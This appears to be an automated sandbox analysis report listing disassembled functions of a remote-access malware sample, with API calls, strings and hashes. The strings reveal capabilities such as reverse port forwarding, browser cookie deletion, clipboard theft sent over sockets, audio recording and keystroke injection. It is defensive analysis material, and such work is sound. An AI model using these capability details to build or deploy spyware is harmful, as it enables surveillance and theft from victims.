                                Function 00450F63 Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                Download Yara Rule
                                APIs
                                • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045123C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 0045100F
                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 00451092
                                • __alloca_probe_16.LIBCMT ref: 004510CA
                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,0045123C,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 00451125
                                • __alloca_probe_16.LIBCMT ref: 00451174
                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 0045113C
                                  • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 004511B8
                                • __freea.LIBCMT ref: 004511E3
                                • __freea.LIBCMT ref: 004511EF
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                • String ID:
                                • API String ID: 201697637-0
                                • Opcode ID: 3fb5d38a305e3cd885e4cf01d6a6faccac9c0be3147af9b9f82741c0feb9dacf
                                • Instruction ID: 005ec385ace484c3041e352596739c7debf7d66643145b34d09858c349e559c3
                                • Opcode Fuzzy Hash: 3fb5d38a305e3cd885e4cf01d6a6faccac9c0be3147af9b9f82741c0feb9dacf
                                • Instruction Fuzzy Hash: C191D632E002169BDB209EA5C881BAF7BB59F09716F14025BED00E7292D72DDD89C768
                                Function 0044268B Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                  • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                  • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                  • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                • _memcmp.LIBVCRUNTIME ref: 00442935
                                • _free.LIBCMT ref: 004429A6
                                • _free.LIBCMT ref: 004429BF
                                • _free.LIBCMT ref: 004429F1
                                • _free.LIBCMT ref: 004429FA
                                • _free.LIBCMT ref: 00442A06
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorLast$_abort_memcmp
                                • String ID: C
                                • API String ID: 1679612858-1037565863
                                • Opcode ID: 432fc3ea507ab00d5c61cbebfc7d6860faf6a87f9b6526557229100be8563697
                                • Instruction ID: aeaf983377083d43a1268bd0837f448671c9c2270315b144058cc99b7af0bbb4
                                • Opcode Fuzzy Hash: 432fc3ea507ab00d5c61cbebfc7d6860faf6a87f9b6526557229100be8563697
                                • Instruction Fuzzy Hash: C6B14B75A01219DFEB24DF19C984AAEB7B4FF08314F5045AEE849A7350E774AE90CF44
                                Function 00413360 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: tcp$udp
                                • API String ID: 0-3725065008
                                • Opcode ID: 688bcc682103751b5d6e0fc50f4ff73081394bc5db4df513150874dffde81862
                                • Instruction ID: 0146648cb9627796ba72a5075a1bb19f593c332394d5faf8ede73001e6eead87
                                • Opcode Fuzzy Hash: 688bcc682103751b5d6e0fc50f4ff73081394bc5db4df513150874dffde81862
                                • Instruction Fuzzy Hash: 0271AB306083029FDB24CF55C4456ABBBE5AB88B06F14483FF88587351DB78CE85CB8A
                                Function 0040FF5A Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 191COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Eventinet_ntoa
                                • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                • API String ID: 3578746661-168337528
                                • Opcode ID: 91f6b250a27052f763f33f931300f679483c58cf17455d7b6bb400d635c1d2e1
                                • Instruction ID: 6b7c77c2de925f44c7fd0444b04eaa142d1c015a05a303cede5520b91582e870
                                • Opcode Fuzzy Hash: 91f6b250a27052f763f33f931300f679483c58cf17455d7b6bb400d635c1d2e1
                                • Instruction Fuzzy Hash: 1B51C671A043005BC704FB35E81AAAE36A56B85304F50453FF942972E2EFBD998987CF
                                Function 004069F4 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00471E78,00462F54,?,00000000,0040708D,00000000), ref: 00406A56
                                • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,0040708D,00000000,?,?,0000000A,00000000), ref: 00406A9E
                                  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                • CloseHandle.KERNEL32(00000000,?,00000000,0040708D,00000000,?,?,0000000A,00000000), ref: 00406ADE
                                • MoveFileW.KERNEL32(00000000,00000000), ref: 00406AFB
                                • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406B26
                                • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406B36
                                  • Part of subcall function 00404B76: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00471E90,00404C29,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404B85
                                  • Part of subcall function 00404B76: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040546B), ref: 00404BA3
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                • String ID: .part
                                • API String ID: 1303771098-3499674018
                                • Opcode ID: b311657231bfd1ddbcc4a820267832357b1505ed209a9d42b0dbde4102a0be9c
                                • Instruction ID: 678cfffe15af58d7f0b712f13b91f409224560124cae5e22a1f642ab954cf825
                                • Opcode Fuzzy Hash: b311657231bfd1ddbcc4a820267832357b1505ed209a9d42b0dbde4102a0be9c
                                • Instruction Fuzzy Hash: 183195715043519FC210FF61D8859AFB7E8EF84305F40493FB946A21E1DB78DE488B9A
                                Function 00446FC4 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043E2F6,0043E2F6,?,?,?,00447215,00000001,00000001,80E85006), ref: 0044701E
                                • __alloca_probe_16.LIBCMT ref: 00447056
                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00447215,00000001,00000001,80E85006,?,?,?), ref: 004470A4
                                • __alloca_probe_16.LIBCMT ref: 0044713B
                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,80E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044719E
                                • __freea.LIBCMT ref: 004471AB
                                  • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                                • __freea.LIBCMT ref: 004471B4
                                • __freea.LIBCMT ref: 004471D9
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                • String ID:
                                • API String ID: 3864826663-0
                                • Opcode ID: 04037ebd5a1a4f50f5415f33d7545ea1837db620aa2cb0a216d5dedd30da5abc
                                • Instruction ID: 54c76e5b98bc3e662f405ec50a570bffd16f8396d3d33e450f7b83ec1f761fab
                                • Opcode Fuzzy Hash: 04037ebd5a1a4f50f5415f33d7545ea1837db620aa2cb0a216d5dedd30da5abc
                                • Instruction Fuzzy Hash: C051F372604216AFFB258F65CC81EAF77A9EB44754F19422EFC04D6340EB38DC4296A8
                                Function 00417949 Relevance: 12.1, APIs: 8, Instructions: 102keyboardCOMMON
                                Download Yara Rule
                                APIs
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417982
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179A3
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179C3
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179D7
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179ED
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417A0A
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417A25
                                • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00417A41
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: InputSend
                                • String ID:
                                • API String ID: 3431551938-0
                                • Opcode ID: 6aaf5890e5c1829a4f0a9f9de961f2057ca44ae286fc2f2a8f4f79c9cdb01491
                                • Instruction ID: 18205c9a4f61e0979ba7f31da2e0396e133b47f61cec1eebe1044e0c870e5742
                                • Opcode Fuzzy Hash: 6aaf5890e5c1829a4f0a9f9de961f2057ca44ae286fc2f2a8f4f79c9cdb01491
                                • Instruction Fuzzy Hash: BF3180715583086EE311CF51D941BEBBFECEF99B54F00080FF6809A191D2A696C98BA7
                                Function 00414F40 Relevance: 12.0, APIs: 8, Instructions: 49clipboardCOMMON
                                Download Yara Rule
                                APIs
                                • OpenClipboard.USER32 ref: 00414F41
                                • EmptyClipboard.USER32 ref: 00414F4F
                                • CloseClipboard.USER32 ref: 00414F55
                                • OpenClipboard.USER32 ref: 00414F5C
                                • GetClipboardData.USER32(0000000D), ref: 00414F6C
                                • GlobalLock.KERNEL32(00000000), ref: 00414F75
                                • GlobalUnlock.KERNEL32(00000000), ref: 00414F7E
                                • CloseClipboard.USER32 ref: 00414F84
                                  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                • String ID:
                                • API String ID: 2172192267-0
                                • Opcode ID: 828cfcc74c82ea041a7dd29e4e1c173cc2e20efda03bf5817e1bab7b2f8bf981
                                • Instruction ID: b342c93700c1c5b5557293b3c64df63ecfc3f94f93ee8c928ebb46f035b43356
                                • Opcode Fuzzy Hash: 828cfcc74c82ea041a7dd29e4e1c173cc2e20efda03bf5817e1bab7b2f8bf981
                                • Instruction Fuzzy Hash: 7C015E312443009BD314BF71DC596AA76A8EBE0346F81057EB94A931A3DF3899498A9A
                                Function 00447757 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00447ECC,00453EB5,00000000,00000000,00000000,00000000,00000000), ref: 00447799
                                • __fassign.LIBCMT ref: 00447814
                                • __fassign.LIBCMT ref: 0044782F
                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00447855
                                • WriteFile.KERNEL32(?,00000000,00000000,00447ECC,00000000,?,?,?,?,?,?,?,?,?,00447ECC,00453EB5), ref: 00447874
                                • WriteFile.KERNEL32(?,00453EB5,00000001,00447ECC,00000000,?,?,?,?,?,?,?,?,?,00447ECC,00453EB5), ref: 004478AD
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                • String ID:
                                • API String ID: 1324828854-0
                                • Opcode ID: a748b16374f527b7a80cf69ed727348adf3f69da4df0249be72511d103bd3332
                                • Instruction ID: 74b5e8c6f427b63fe2026e60454d3d85c0c1d9029b0a2cc1a9ecb7a500eaa1fe
                                • Opcode Fuzzy Hash: a748b16374f527b7a80cf69ed727348adf3f69da4df0249be72511d103bd3332
                                • Instruction Fuzzy Hash: 32510870E042499FEB10DFA8DC85AEEBBF8EF09300F14416BE951E7291E7749941CB69
                                Function 00453DF4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 152COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID: $-E$$-E
                                • API String ID: 269201875-3140958853
                                • Opcode ID: e48a72c45575700ceddfc4a13269a7974e50b6c85b9f24d2dc50821f03aae928
                                • Instruction ID: 9707d98a659f88f98630b1874925085f47dfd26ea07d7c57405a666b90b138a8
                                • Opcode Fuzzy Hash: e48a72c45575700ceddfc4a13269a7974e50b6c85b9f24d2dc50821f03aae928
                                • Instruction Fuzzy Hash: 69412C32A041006BDB21AFBA8C4666F3BA5DF453B7F10461FFC18D6293DB3C8E15466A
                                Function 00401CEB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89COMMON
                                Download Yara Rule
                                APIs
                                • _strftime.LIBCMT ref: 00401D30
                                  • Part of subcall function 00401A4D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9
                                • waveInUnprepareHeader.WINMM(0046FA78,00000020,00000000,?), ref: 00401DE2
                                • waveInPrepareHeader.WINMM(0046FA78,00000020), ref: 00401E20
                                • waveInAddBuffer.WINMM(0046FA78,00000020), ref: 00401E2F
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                • String ID: %Y-%m-%d %H.%M$.wav
                                • API String ID: 3809562944-3597965672
                                • Opcode ID: b10e30c525f246f4611f68b91188478031edfba2b9a6cbdc9954c4cf903c77cf
                                • Instruction ID: eb6f517cf981021e41f9baa65c06222081641aa24e02a1e4c78245b08a68fc14
                                • Opcode Fuzzy Hash: b10e30c525f246f4611f68b91188478031edfba2b9a6cbdc9954c4cf903c77cf
                                • Instruction Fuzzy Hash: 743150315043009BC314EBA1EC56A9E77E8FB54318F50893EF599A21F2EFB49909CB5E
                                Function 0040AE2A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00411F91: RegOpenKeyExA.ADVAPI32(80000002,00000400,00000000,00020019,?), ref: 00411FB5
                                  • Part of subcall function 00411F91: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00411FD2
                                  • Part of subcall function 00411F91: RegCloseKey.ADVAPI32(?), ref: 00411FDD
                                • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040AEAC
                                • PathFileExistsA.SHLWAPI(?), ref: 0040AEB9
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                • API String ID: 1133728706-4073444585
                                • Opcode ID: 2710e71acfe910868fa7bd05cf86435756edf937fb7501142c457778cac90120
                                • Instruction ID: 9e227284a7a69f00510d3be81dd7cde1580ac9a58a9ca8fbd928e09bf644cbd9
                                • Opcode Fuzzy Hash: 2710e71acfe910868fa7bd05cf86435756edf937fb7501142c457778cac90120
                                • Instruction Fuzzy Hash: CF21B170A4020556CB00FBE2CC97DEE7368AF51348F80013FB901772D2EB795A45C6DA
                                Function 00453D2D Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a9bccf30988101774ee440fa5cc9a08b358316fbf5677ac8bfda6d7ead677197
                                • Instruction ID: 106e2cecea33a690a52cc41c1271e31c3df1f85e8271d36c5dacef07d135bc52
                                • Opcode Fuzzy Hash: a9bccf30988101774ee440fa5cc9a08b358316fbf5677ac8bfda6d7ead677197
                                • Instruction Fuzzy Hash: 2C113232504214BBCB213F769C0596B7B7CDF857A7F11062BFC1583292DA38C9089269
                                Function 0044E0DA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0044DE21: _free.LIBCMT ref: 0044DE4A
                                • _free.LIBCMT ref: 0044E128
                                  • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                  • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                • _free.LIBCMT ref: 0044E133
                                • _free.LIBCMT ref: 0044E13E
                                • _free.LIBCMT ref: 0044E192
                                • _free.LIBCMT ref: 0044E19D
                                • _free.LIBCMT ref: 0044E1A8
                                • _free.LIBCMT ref: 0044E1B3
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
                                • Instruction ID: b65b67035ea7ffc6fe2c1778d32cb4f6cbb79ca162155871331ff7aa41bb66fd
                                • Opcode Fuzzy Hash: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
                                • Instruction Fuzzy Hash: 64111571940B08AAE520BFF2CC47FCBB7DC9F14708F50882EB29D6A552DA7DB6044654
                                Function 004192AE Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
                                  • Part of subcall function 00411F91: RegOpenKeyExA.ADVAPI32(80000002,00000400,00000000,00020019,?), ref: 00411FB5
                                  • Part of subcall function 00411F91: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00411FD2
                                  • Part of subcall function 00411F91: RegCloseKey.ADVAPI32(?), ref: 00411FDD
                                • StrToIntA.SHLWAPI(00000000,00469710,00000000,00000000,00000000,00471FFC,00000001,?,?,?,?,?,?,0040D6A0), ref: 00419327
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCurrentOpenProcessQueryValue
                                • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                • API String ID: 1866151309-2070987746
                                • Opcode ID: 905e145e97e877e89bffcd847be86f3e5d4b8ef02cc69856730a9e086f165d02
                                • Instruction ID: a9b62d1d1389f8d2b696bc63f2982e792167bed2dd8bed00043a633dd184e9c5
                                • Opcode Fuzzy Hash: 905e145e97e877e89bffcd847be86f3e5d4b8ef02cc69856730a9e086f165d02
                                • Instruction Fuzzy Hash: E411E371A002456AC704B765CC67AAF761D8B54309F64053FF905A71E2FABC4D8282AA
                                Function 004380FA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetLastError.KERNEL32(?,?,004380F1,0043705E), ref: 00438108
                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00438116
                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043812F
                                • SetLastError.KERNEL32(00000000,?,004380F1,0043705E), ref: 00438181
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLastValue___vcrt_
                                • String ID:
                                • API String ID: 3852720340-0
                                • Opcode ID: a51cd608757b9cf21dde5cb3b99bb74488ace4818edb59339c74db540250a301
                                • Instruction ID: 5a832d73688d02476ca7511e273f3515cfb573674d76dbd3fe9934521fa1a72b
                                • Opcode Fuzzy Hash: a51cd608757b9cf21dde5cb3b99bb74488ace4818edb59339c74db540250a301
                                • Instruction Fuzzy Hash: F101283210C3326EAA102F767C85A1BAA94EB09779F31633FF214951E1FFA99C02550C
                                Function 0040A9E2 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                Download Yara Rule
                                APIs
                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040AA1E
                                • GetLastError.KERNEL32 ref: 0040AA28
                                Strings
                                • [Chrome Cookies found, cleared!], xrefs: 0040AA4E
                                • UserProfile, xrefs: 0040A9EE
                                • [Chrome Cookies not found], xrefs: 0040AA42
                                • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040A9E9
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: DeleteErrorFileLast
                                • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                • API String ID: 2018770650-304995407
                                • Opcode ID: b4927beb3b7d8682d6e8687247d88e98b96e581d4f5d1102126ce03b4be6211c
                                • Instruction ID: 1f34f6daae66b163f55af04f15e1d0b60933b3567ae099988c08ef58cbd90c9e
                                • Opcode Fuzzy Hash: b4927beb3b7d8682d6e8687247d88e98b96e581d4f5d1102126ce03b4be6211c
                                • Instruction Fuzzy Hash: 0E01F731B4020467C6047A75DD278AE77249951304B50057FF402773D2FD798915CA9F
                                Function 00418D76 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30sleepCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00418DA8
                                • PlaySoundW.WINMM(00000000,00000000), ref: 00418DB6
                                • Sleep.KERNEL32(00002710), ref: 00418DBD
                                • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00418DC6
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: PlaySound$HandleLocalModuleSleepTime
                                • String ID: Alarm triggered$`Mw
                                • API String ID: 614609389-968373943
                                • Opcode ID: bdf6e914fbef22af66a0bd792b19461622f07135ad8277a1fc3addc14a55c3ce
                                • Instruction ID: 312fa8acbc24107594bc9953998d05cc744500d2263fe9839a2dc32143519282
                                • Opcode Fuzzy Hash: bdf6e914fbef22af66a0bd792b19461622f07135ad8277a1fc3addc14a55c3ce
                                • Instruction Fuzzy Hash: 9EE01226E4026037A510376A6D0FC6F2D2DDBD3B6274501AFFA04571D2D9A4080186FF
                                Function 0043887C Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                Download Yara Rule
                                APIs
                                • __allrem.LIBCMT ref: 00438A09
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A25
                                • __allrem.LIBCMT ref: 00438A3C
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A5A
                                • __allrem.LIBCMT ref: 00438A71
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A8F
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                • String ID:
                                • API String ID: 1992179935-0
                                • Opcode ID: e54fcd2a271a95563de48233a52a921a5b89548056e17f80f76cd68e5be4f8c8
                                • Instruction ID: 1db505a437643d25cad1e1ab06004ebe691486694b679651004c0d70fbe8f9c1
                                • Opcode Fuzzy Hash: e54fcd2a271a95563de48233a52a921a5b89548056e17f80f76cd68e5be4f8c8
                                • Instruction Fuzzy Hash: CD815972A007069BE724BA29CC41B6BF3E8AF49328F14512FF511D6382EF78D900875D
                                Function 00442E0B Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: __cftoe
                                • String ID:
                                • API String ID: 4189289331-0
                                • Opcode ID: 6721aee484eec6af142a787e0ccbed3fea0baaedfcb9b8799baac12631cf5e23
                                • Instruction ID: 4563a9c63fae0d6d7f7aa9a83d474a3ec136fb2d14012502de5dff0b8c27d610
                                • Opcode Fuzzy Hash: 6721aee484eec6af142a787e0ccbed3fea0baaedfcb9b8799baac12631cf5e23
